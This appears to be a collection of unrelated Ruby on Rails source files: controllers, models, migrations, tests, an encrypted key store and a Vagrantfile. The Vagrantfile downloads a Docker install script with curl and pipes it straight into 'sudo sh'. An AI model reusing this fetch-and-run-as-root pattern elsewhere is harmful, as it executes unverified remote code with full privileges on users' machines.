head :ok
end
private
def set_review
@review = Review.find(params[:id])
end
def review_params
params.require(:review).permit(:msg, :user_id, :product_id)
end
def can_manage
unless current_user and current_user.is_admin
redirect_to :back, notice: 'Only Admin allow to manage'
end
end
end
|
require_relative './base'
module BandCampBX
module Entities
class Order < Base
class InvalidTypeError < StandardError; end
def self.map_type
->(val) do
case val.to_s
when 'Quick Sell'
:sell
when 'Quick Buy'
:buy
else
raise InvalidTypeError
end
end
end
def self.mappings
{
id: map_int,
datetime: map_time,
type: map_type,
price: map_decimal,
amount: map_decimal
}
end
def self.attribute_names
{
id: "Order ID",
datetime: "Order Entered",
type: "Order Type",
price: "Price",
amount: "Quantity"
}
end
setup_readers
end
end
end
|
Rails.application.routes.draw do
concern :api_base do
resources :sessions, only: [:create]
resources :registrations, only: [:create, :update, :destroy]
resources :products, param: :slug
resources :categories, param: :slug do
get :just_category, to: "categories#just_category"
end
resources :cart_items, except: [:show, :edit]
resources :charges
resources :invoices
delete :logout, to: "sessions#logout"
get :logged_in, to: "sessions#logged_in"
post "confirm", to: "charges#confirm"
patch "shipped", to: "invoices#shipped"
get "customerinfo", to: "charges#new"
post "search_product", to: "products#search"
get "specific_categories", to: "categories#specific"
root to: "static#home"
end
namespace :v1 do
concerns :api_base
end
end
|
require_relative 'grid'
# a class called Game that controlls the game, changing the grid, etc.
class Game
attr_reader :grid
def initialize(grid = Grid.new)
@grid = grid
end
def tile_alive(coodinates)
@grid.tiles[coodinates[:x]][coodinates[:y]].birth
end
def prompt_for_coordinates
puts 'enter coodinate for a cell you want to start as alive (seperated by a comma eg. 12,3)'
input
end
def input(nasty_xy = gets.chomp)
coordinates = nasty_xy.split(',')
{ x: coordinates[0].to_i, y: coordinates[1].to_i }
end
end
|
module Trustworthy
class Settings
def self.open(filename)
store = YAML::Store.new(filename)
store.ultra_safe = true if store.respond_to?(:ultra_safe=)
store.transaction do
yield Trustworthy::Settings.new(store)
end
end
def initialize(store)
@store = store
end
def add_key(key, username, password)
salt = SCrypt::Engine.generate_salt
encrypted_point = _encrypt(key.to_s, salt, password)
@store[username] = {'salt' => salt, 'encrypted_point' => encrypted_point}
end
def empty?
@store.roots.empty?
end
def find_key(username)
@store[username]
end
def has_key?(username)
@store.root?(username)
end
def recoverable?
@store.roots.count >= 2
end
def unlock_key(username, password)
key = find_key(username)
salt = key['salt']
ciphertext = key['encrypted_point']
plaintext = _decrypt(ciphertext, salt, password)
Trustworthy::Key.create_from_string(plaintext)
end
def _cipher_from_password(salt, password)
cost, salt = salt.rpartition('$')
key = SCrypt::Engine.scrypt(password, salt, cost, Trustworthy::Cipher.key_len)
Trustworthy::Cipher.new(key)
end
def _decrypt(ciphertext, salt, password)
cipher = _cipher_from_password(salt, password)
nonce, ciphertext = ciphertext.split('--').map do |field|
Base64.decode64(field)
end
cipher.decrypt(nonce, '', ciphertext)
end
def _encrypt(plaintext, salt, password)
cipher = _cipher_from_password(salt, password)
nonce = Trustworthy::Cipher.generate_nonce
ciphertext = cipher.encrypt(nonce, '', plaintext)
[nonce, ciphertext].map do |field|
Base64.encode64(field).gsub("\n", '')
end.join('--')
end
end
end
|
class CategoriesController < ApplicationController
def show
# binding.pry
@category = Category.find_by(params[:id])
end
def index
@categories = Category.all
end
private
def category_params
params.require(:category).permit(:title)
end
end
|
require 'test_helper'
class PostsControllerTest < ActionDispatch::IntegrationTest
setup do
@post = posts(:one)
end
test "should get index" do
get posts_url
assert_response :success
end
test "should get new" do
get new_post_url
assert_response :success
end
test "should create post" do
assert_difference('Post.count') do
post posts_url, params: { post: { activity: @post.activity, address: @post.address, bar: @post.bar, favorite_id: @post.favorite_id, image: @post.image, location_id: @post.location_id, location_name: @post.location_name, phone: @post.phone, post_name: @post.post_name, rating_id: @post.rating_id, restaurant: @post.restaurant, text: @post.text, user_id: @post.user_id } }
end
assert_redirected_to post_url(Post.last)
end
test "should show post" do
get post_url(@post)
assert_response :success
end
test "should get edit" do
get edit_post_url(@post)
assert_response :success
end
test "should update post" do
patch post_url(@post), params: { post: { activity: @post.activity, address: @post.address, bar: @post.bar, favorite_id: @post.favorite_id, image: @post.image, location_id: @post.location_id, location_name: @post.location_name, phone: @post.phone, post_name: @post.post_name, rating_id: @post.rating_id, restaurant: @post.restaurant, text: @post.text, user_id: @post.user_id } }
assert_redirected_to post_url(@post)
end
test "should destroy post" do
assert_difference('Post.count', -1) do
delete post_url(@post)
end
assert_redirected_to posts_url
end
end
|
require 'test_helper'
class PalletsControllerTest < ActionDispatch::IntegrationTest
setup do
@pallet = pallets(:one)
end
test "should get index" do
get pallets_url
assert_response :success
end
test "should get new" do
get new_pallet_url
assert_response :success
end
test "should create pallet" do
assert_difference('Pallet.count') do
post pallets_url, params: { pallet: { current_location: @pallet.current_location, destination_cc: @pallet.destination_cc, next_location: @pallet.next_location, number_of_pallets: @pallet.number_of_pallets, origin_cc: @pallet.origin_cc, vendor_code: @pallet.vendor_code } }
end
assert_redirected_to pallet_url(Pallet.last)
end
test "should show pallet" do
get pallet_url(@pallet)
assert_response :success
end
test "should get edit" do
get edit_pallet_url(@pallet)
assert_response :success
end
test "should update pallet" do
patch pallet_url(@pallet), params: { pallet: { current_location: @pallet.current_location, destination_cc: @pallet.destination_cc, next_location: @pallet.next_location, number_of_pallets: @pallet.number_of_pallets, origin_cc: @pallet.origin_cc, vendor_code: @pallet.vendor_code } }
assert_redirected_to pallet_url(@pallet)
end
test "should destroy pallet" do
assert_difference('Pallet.count', -1) do
delete pallet_url(@pallet)
end
assert_redirected_to pallets_url
end
end
|
class Category < ActiveRecord::Base
has_many :categorizations
has_many :events, :through => :categorizations
has_many :taggings, :as => :taggable
has_many :tags, :through => :taggings
has_attached_file :image, :styles => { :small => "100x100#", :medium => "250x250#" }
validates :name, :uniqueness => true
validates_presence_of :description, :image
def to_param
"#{name.downcase.gsub(/[^[:alnum:]]/,'-')}".gsub(/-{2,}/,'-')
end
end
|
class Place < ApplicationRecord
has_and_belongs_to_many :itineraries
has_and_belongs_to_many :categories
end
|
require_relative 'test_helper'
require_relative '../lib/transaction_repository'
require_relative '../lib/transaction'
class TransactionRepositoryTest < Minitest::Test
def setup
@transaction_1 = Transaction.new({:id => 6, :invoice_id => 8, :credit_card_number => "4242424242421111", :credit_card_expiration_date => "0220", :result => :success, :created_at => Time.now, :updated_at => Time.now})
@transaction_2 = Transaction.new({:id => 7, :invoice_id => 9, :credit_card_number => "4242424242422222", :credit_card_expiration_date => "0321", :result => :success, :created_at => Time.now, :updated_at => Time.now})
@transaction_3 = Transaction.new({:id => 8, :invoice_id => 10, :credit_card_number => "4242424242423333", :credit_card_expiration_date => "0422", :result => :success, :created_at => Time.now, :updated_at => Time.now})
@transaction_4 = Transaction.new({:id => 9, :invoice_id => 11, :credit_card_number => "4242424242424444", :credit_card_expiration_date => "0523", :result => :success, :created_at => Time.now, :updated_at => Time.now})
@transactions = [@transaction_1, @transaction_2, @transaction_3, @transaction_4]
@transaction_repository = TransactionRepository.new(@transactions)
end
def test_it_exists
assert_instance_of TransactionRepository, @transaction_repository
end
def test_it_returns_all_transactions
assert_equal @transactions, @transaction_repository.all
end
def test_it_can_find_by_id
assert_equal @transaction_1, @transaction_repository.find_by_id(6)
assert_equal nil, @transaction_repository.find_by_id(8798798)
end
def test_it_can_find_all_by_invoice_id
assert_equal [], @transaction_repository.find_all_by_invoice_id(37)
assert_equal [@transaction_4], @transaction_repository.find_all_by_invoice_id(11)
end
def test_it_can_find_by_credit_card_number
assert_equal [], @transaction_repository.find_all_by_credit_card_number("987987987")
assert_equal [@transaction_3], @transaction_repository.find_all_by_credit_card_number("4242424242423333")
end
def test_it_can_find_all_by_result
assert_equal [], @transaction_repository.find_all_by_result("card shut off")
assert_equal @transactions, @transaction_repository.find_all_by_result(:success)
end
def test_transaction_can_be_created
@transaction_repository.create({:id => 6, :invoice_id => 8, :credit_card_number => "4242424242425555", :credit_card_expiration_date => "0720", :result => :success, :created_at => Time.now, :updated_at => Time.now})
actual = @transaction_repository.all.last.id
assert_equal 10, actual
assert_equal 5, @transaction_repository.all.count
end
def test_it_can_be_updated
original_time = @transaction_1.updated_at
@transaction_repository.update(6, {:id => 6, :invoice_id => 8, :credit_card_number => "4242424242429999", :credit_card_expiration_date => "0223", :result => :bingo, :created_at => Time.now, :updated_at => Time.now})
assert original_time < @transaction_1.updated_at
actual = @transaction_repository.find_by_id(6).credit_card_number
assert_equal "4242424242429999", actual
actual = @transaction_repository.find_by_id(6).credit_card_expiration_date
assert_equal "0223", actual
actual = @transaction_repository.find_by_id(6).result
assert_equal :bingo, actual
end
def test_transaction_can_be_deleted
assert_equal 4, @transaction_repository.all.count
@transaction_repository.delete(8)
assert_equal 3, @transaction_repository.all.count
assert_equal nil, @transaction_repository.find_by_id(8)
end
end
|
module PagesHelper
# Returns a hash of { date => num }. Puts chart data on a fixed axis to
# prevent weird scaling by filling in empty dates with a count of 0.
def daily_date_data(date_count_data, date_range)
Hash[date_range.map { |date| [date, 0] }].merge(date_count_data)
end
end
|
# Your Code Here
def map(array)
i = 0
while i < array.length
array[i] = yield(array[i])
i += 1
end
array
end
def reduce(array, starting_point = nil)
if starting_point
sum = starting_point
i = 0
else
sum = array[0]
i = 1
end
while i < array.length
sum = yield(sum, array[i])
i += 1
end
sum
end
# def reduce(array, starting_point = nil)
# i = 0
# total = 0
# new_array = []
# if starting_point
# while i < array.length
# starting_point = yield(starting_point, array[i])
# i += 1
# end
# return starting_point
# else
# while i < array.length
# if array[i] == true
# return yield(array[i])
# elsif array[i] != true
# return yield(array[i])
# end
# total = yield(total, array[i])
# i += 1
# end
# end
# total
# end
# def reduce(array)
# i = 0
# new_array = []
# while i < array.length
# if array[i]
# new_array << array[i]
# else
# end
# i += 1
# end
# if new_array.length == 0
# return FALSE
# else
# return TRUE
# end
# end |
class Hash
def keys_of(*arguments)
#splat(*) captures whatever other arguments you pass into the method.
#the splat is required for when you're passing multiple keys
collect {|key,value| arguments.include?(value)? key:nil}.compact
#collect enumerator pulls and passes array
#the block compares whether the arguments(array) contains any matches to argument
#the "?" is an if true statement. If true it passes the key: value.
#compact cleans up the collect array without any nils
end
end
|
class AddEmailUniquenessIndex < ActiveRecord::Migration
def self.up
add_index :users, :mail, :unique => true
end
def self.down
remove_index :users, :mail
end
end
|
require 'spec_helper'
describe "personal_informations/edit" do
before(:each) do
@personal_information = assign(:personal_information, stub_model(PersonalInformation,
:Id_Number => ""
))
end
it "renders the edit personal_information form" do
render
# Run the generator again with the --webrat flag if you want to use webrat matchers
assert_select "form[action=?][method=?]", personal_information_path(@personal_information), "post" do
assert_select "input#personal_information_Id_Number[name=?]", "personal_information[Id_Number]"
end
end
end
|
class RemoveGameIdFromUnit < ActiveRecord::Migration[5.1]
def change
remove_column :units, :game_id, :integer
end
end
|
require "spec_helper"
describe ResidencesController do
describe "routing" do
it "routes to #index" do
get("/residences").should route_to("residences#index")
end
it "routes to #new" do
get("/residences/new").should route_to("residences#new")
end
it "routes to #show" do
get("/residences/1").should route_to("residences#show", :id => "1")
end
it "routes to #edit" do
get("/residences/1/edit").should route_to("residences#edit", :id => "1")
end
it "routes to #create" do
post("/residences").should route_to("residences#create")
end
it "routes to #update" do
put("/residences/1").should route_to("residences#update", :id => "1")
end
it "routes to #destroy" do
delete("/residences/1").should route_to("residences#destroy", :id => "1")
end
end
end
|
class Shelf < ApplicationRecord
validates :user_id, presence: true
end
|
class AddImportedIdToGoals < ActiveRecord::Migration[5.1]
def change
add_column :goals, :imported_id, :bigint
end
end
|
class UserPolicy < ApplicationPolicy
def create?
user.admin?
end
def update?
user.admin? || is_self?
end
def destroy?
return false if is_guest?
user.admin? || is_self?
end
private
def is_self?
user == record
end
end
|
require 'test_helper'
class HistoricAssetsControllerTest < ActionController::TestCase
setup do
@historic_asset = historic_assets(:one)
end
test "should get index" do
get :index
assert_response :success
assert_not_nil assigns(:historic_assets)
end
test "should get new" do
get :new
assert_response :success
end
test "should create historic_asset" do
assert_difference('HistoricAsset.count') do
post :create, historic_asset: { description: @historic_asset.description, historic_asset_type: @historic_asset.historic_asset_type }
end
assert_redirected_to historic_asset_path(assigns(:historic_asset))
end
test "should show historic_asset" do
get :show, id: @historic_asset
assert_response :success
end
test "should get edit" do
get :edit, id: @historic_asset
assert_response :success
end
test "should update historic_asset" do
patch :update, id: @historic_asset, historic_asset: { description: @historic_asset.description, historic_asset_type: @historic_asset.historic_asset_type }
assert_redirected_to historic_asset_path(assigns(:historic_asset))
end
test "should destroy historic_asset" do
assert_difference('HistoricAsset.count', -1) do
delete :destroy, id: @historic_asset
end
assert_redirected_to historic_assets_path
end
end
|
VAGRANTFILE_API_VERSION = "2"
name = "docker"
home = "/home/vagrant/project"
memory = "512"
cpu="2"
Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
config.vm.box = "precise64"
config.vm.box_url = "http://files.vagrantup.com/precise64.box"
config.vm.provider "virtualbox" do |v|
v.name = name
v.customize ["modifyvm", :id, "--memory", memory]
v.customize ["modifyvm", :id, "--cpus", cpu]
v.customize ["modifyvm", :id, "--vram", "16"]
end
#sync
config.vm.synced_folder ".", home
#provision
config.vm.provision "shell", inline: "sudo apt-get install -y curl"
config.vm.provision "shell", inline: "curl -sSL https://get.docker.io/ubuntu/ | sudo sh"
end
|
class CreateMediaFiles < ActiveRecord::Migration
def change
create_table :media_files do |t|
t.string :name
t.string :description
t.string :file
t.string :zencoder_output_id
t.boolean :processed
t.string :file
t.string :asset_type
t.integer :file_size
t.string :content_type
t.references :sermon
t.timestamps
end
end
end
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.